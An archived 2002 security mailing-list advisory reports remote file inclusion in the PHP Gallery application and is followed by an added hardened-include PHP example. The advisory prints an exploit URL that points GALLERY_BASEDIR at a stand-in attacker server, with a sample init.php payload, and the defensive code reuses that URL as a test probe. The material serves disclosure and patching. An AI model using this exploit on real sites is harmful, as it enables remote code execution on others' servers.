Open Source and information security mailing list archives
Message-ID: <5259.1028202010@www22.gmx.net>
From: avart at gmx.de (avart@....de)
Subject: Additional bugs in gallery

Hi!

Code injection in gallery
-------------------------------------

# What is gallery

The Gallery is actually the best web gallery application around in the world. I'm using it too ;-). Go to <http://gallery.sf.net/> to get further information.

#### remote include problems ####

# Problem description

There are several include statements that include a variable without checking it. An administrator of PowerTech (an ISP in Norway) discovered these problems. You're able to inject foreign code into the application (if allow_url_fopen is turned on).

Example code: errors/configmode.php

[...]
<? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?>
[...]

# How can I exploit the code?

Use this line:

http://hostname/gallery/captionator.php?GALLERY_BASEDIR=http://your.evil.server.tdl/

On http://your.evil.server.tdl/ you place a file called init.php that puts out nasty php-code. The file could look like this:

init.php:
<?php echo "<?php phpinfo(); ?>"; ?>

# And the solution?

Go to <http://gallery.menalto.com/modules.php?op=modload&name=News&file=article&sid=50&mode=thread&order=0&thold=0> to see how to solve the problem.

# Why do you post this problem again?

Because the author of the announcement on the gallery website said:

An alternative to doing a full upgrade is to patch the files that contain the security fix. This is relatively easy to do. All you need to do is edit these files:

errors/configmode.php
errors/needinit.php
errors/reconfigure.php
errors/unconfigured.php

That's not absolutely right... you have to patch the file captionator.php too!

Hope it's fixed in new releases :).

##### Credits #####

For the German-speaking folk: <http://bluephod.net/>

Noncredit: florg, thank you for turning off the whole website! :/

--
GMX - The communication platform on the Internet. http://www.gmx.net
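The advisory above shows the vulnerable include shape but points to an external page for the fix. The following is an added example written for this archive page, not Gallery's own code and not the patch the Gallery announcement refers to. It contrasts the shape quoted in the advisory (a `require()` whose base directory is a global that, with `register_globals` on, a request parameter can set, and that `allow_url_fopen` then lets `require()` fetch from a remote host) with a hardened shape in which the base directory is derived from the script's own location and every include is confined to it. The helper names `gallery_safe_include_path` and `gallery_require`, the `GALLERY_BASEDIR` constant, and the probe strings at the end are assumptions for illustration.

```php
<?php
// Added example (not Gallery's code): vulnerable vs. hardened include.
//
// Vulnerable shape from the advisory (errors/configmode.php):
//   <? require($GALLERY_BASEDIR . "errors/configure_instructions.php") ?>
// With register_globals on, ?GALLERY_BASEDIR=http://... in the request sets
// $GALLERY_BASEDIR, and with allow_url_fopen on, require() fetches and
// executes whatever that remote location serves.
//
// Hardened shape: the base directory is fixed from the script location,
// request data never reaches it, and the resolved path is checked to stay
// inside that directory before anything is included.

// Fixed application root (assumed constant name); not changeable per request.
define('GALLERY_BASEDIR', __DIR__ . '/');

/**
 * Resolve $relative against GALLERY_BASEDIR and return the absolute path,
 * or null if it is a URL/stream wrapper, is absolute, escapes the base
 * directory, or does not exist. Assumed helper; not part of Gallery.
 */
function gallery_safe_include_path($relative)
{
    // Reject anything with a scheme prefix (http://, ftp://, php://, data:).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }
    // Only paths relative to the base directory are acceptable.
    if ($relative === '' || $relative[0] === '/' || $relative[0] === '\\') {
        return null;
    }
    $base = realpath(GALLERY_BASEDIR);
    $full = realpath(GALLERY_BASEDIR . $relative);
    // realpath() returns false for a missing file, so unknown files are
    // rejected too rather than falling through to a broader search path.
    if ($base === false || $full === false) {
        return null;
    }
    // The canonicalised target must lie strictly inside the canonicalised base.
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

/** Include a file by path relative to the fixed base directory, or fail closed. */
function gallery_require($relative)
{
    $path = gallery_safe_include_path($relative);
    if ($path === null) {
        throw new RuntimeException('refusing to include: ' . $relative);
    }
    require $path;
}

// The original line from errors/configmode.php, rewritten:
// gallery_require('errors/configure_instructions.php');

// Self-check from the command line: constructed probes, including the
// remote base directory value quoted in the advisory and a traversal string.
if (PHP_SAPI === 'cli') {
    $probes = array(
        'errors/configure_instructions.php',
        'http://your.evil.server.tdl/',
        '../outside.php',
        '/etc/hostname',
    );
    foreach ($probes as $probe) {
        $r = gallery_safe_include_path($probe);
        printf("%-40s => %s\n", $probe, $r === null ? 'rejected' : $r);
    }
}
```

Run from the command line, the first probe is accepted only if `errors/configure_instructions.php` actually exists under the script's directory; the remote URL, the traversal string and the absolute path are rejected regardless. The point for a reviewer is the first check: with the base directory bound to `__DIR__` and never read from a global, the `captionator.php` case the advisory adds cannot be reintroduced by one file that forgot to be patched, because no file reads the base directory from request data in the first place.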